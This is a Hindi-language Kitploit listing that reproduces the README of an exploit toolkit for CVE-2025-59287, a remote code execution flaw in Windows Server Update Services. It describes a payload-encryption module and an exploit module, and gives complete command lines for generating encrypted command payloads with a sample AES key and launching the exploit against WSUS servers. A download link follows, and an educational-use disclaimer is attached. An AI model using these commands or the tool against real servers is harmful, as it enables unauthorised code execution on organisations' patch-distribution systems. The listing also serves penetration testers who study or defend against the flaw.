Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-59287 — CVE-2025-59287 के लिए शोषण टूलकिट, एक WSUS RCE कमजोरी, जिसमें AES पेलोड एन्क्रिप्शन और अधिकृत पेनेट्रेशन टेस्टिंग के लिए पूर्ण शोषण श्रृंखला शामिल है। | Kitploit
उपकरण/GitHubGitHub/adel-hx0d/cve-2025-59287
एन्क्रिप्शन/डिक्रिप्शन उपकरणपेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubadel-hx0d/cve-2025-59287

cve-2025-59287

CVE-2025-59287 के लिए शोषण टूलकिट, एक WSUS RCE कमजोरी, जिसमें AES पेलोड एन्क्रिप्शन और अधिकृत पेनेट्रेशन टेस्टिंग के लिए पूर्ण शोषण श्रृंखला शामिल है।

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-59287 - WSUS शोषण टूलकिट

द्वारा: adel-h4x0a

⚠️ केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए ⚠️

अवलोकन

यह टूलकिट CVE-2025-59287 का शोषण प्रदर्शित करता है, जो Windows Server Update Services (WSUS) में एक रिमोट कोड निष्पादन भेद्यता है।

घटक

  1. एन्क्रिप्शन मॉड्यूल (cve-2025-59287-encr.py)

· WSUS संचार के लिए AES पेलोड एन्क्रिप्शन · विरासत और सुरक्षित एन्क्रिप्शन मोड दोनों के लिए समर्थन · कस्टम पेलोड जनरेशन

  1. शोषण मॉड्यूल (cve-2025-59287-exp.py)

· CVE-2025-59287 के लिए पूर्ण शोषण श्रृंखला · मजबूत त्रुटि प्रबंधन और पुनर्प्रयास तर्क · कस्टम पेलोड समर्थन

संरचना

root@kitploit:~
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py      # एन्क्रिप्शन मॉड्यूल
├── 📄 cve-2025-59287-exp.py       # शोषण मॉड्यूल
├── 📄 requirements.txt            # निर्भरताएँ
└── 📄 README.md                   # यह फ़ाइल

उपयोग

आवश्यक शर्तें

root@kitploit:~
pip install -r requirements.txt

एन्क्रिप्शन

root@kitploit:~
# मूल एन्क्रिप्शन
python cve-2025-59287-encr.py --command "calc" --mode legacy

# कस्टम कुंजी के साथ एन्क्रिप्शन
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"

# आउटपुट को फ़ाइल में सहेजें
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt

शोषण

root@kitploit:~
# मूल शोषण
python cve-2025-59287-exp.py http://wsus-server:8530

# कस्टम पेलोड के साथ
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt

# उन्नत सेटिंग्स के साथ
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5

विकल्प

एन्क्रिप्शन मॉड्यूल (cve-2025-59287-encr.py)

· --key: हेक्स प्रारूप में AES कुंजी (वैकल्पिक) · --command: निष्पादित करने का आदेश (डिफ़ॉल्ट: calc) · --mode: एन्क्रिप्शन मोड [legacy, secure] (डिफ़ॉल्ट: legacy) · --output: पेलोड सहेजने के लिए आउटपुट फ़ाइल (वैकल्पिक)

शोषण मॉड्यूल (cve-2025-59287-exp.py)

· target: WSUS सर्वर URL (आवश्यक) · --payload: कस्टम बेस64 पेलोड फ़ाइल (वैकल्पिक) · --timeout: सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 30) · --retries: पुनर्प्रयास प्रयासों की संख्या (डिफ़ॉल्ट: 3) · --no-banner: बैनर प्रदर्शन दबाएं (वैकल्पिक)

पूर्ण उदाहरण

root@kitploit:~
# कस्टम पेलोड जनरेट करें
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt

# शोषण निष्पादित करें
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt

कानूनी अस्वीकरण

❗ महत्वपूर्ण चेतावनी:

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पेनिट्रेशन परीक्षण के लिए प्रदान किया गया है। उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध है।

इस उपकरण का उपयोग केवल इसमें किया जाना चाहिए:

· परीक्षण वातावरण जो आपके स्वामित्व में हैं · वे प्रणालियाँ जिनके परीक्षण के लिए आपने लिखित अनुमति प्राप्त की है · शैक्षिक और शैक्षणिक उद्देश्य

डेवलपर इस उपकरण के किसी भी अवैध या अनधिकृत उपयोग के लिए जिम्मेदार नहीं है।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है।

अपडेट

· v1.0: पूर्ण शोषण समर्थन के साथ प्रारंभिक रिलीज़ · v1.1: उन्नत त्रुटि प्रबंधन और लॉगिंग सुधार

योगदान

बग रिपोर्ट और पुल रिक्वेस्ट को उपकरण को जिम्मेदार और नैतिक उपयोग के ढांचे के भीतर बेहतर बनाने के लिए प्रोत्साहित किया जाता है।


नोट: किसी भी प्रणाली का परीक्षण करने से पहले हमेशा लिखित अनुमति प्राप्त करें। सुरक्षा जागरूकता जिम्मेदारी से शुरू होती है। 🔒

टूल डाउनलोड करें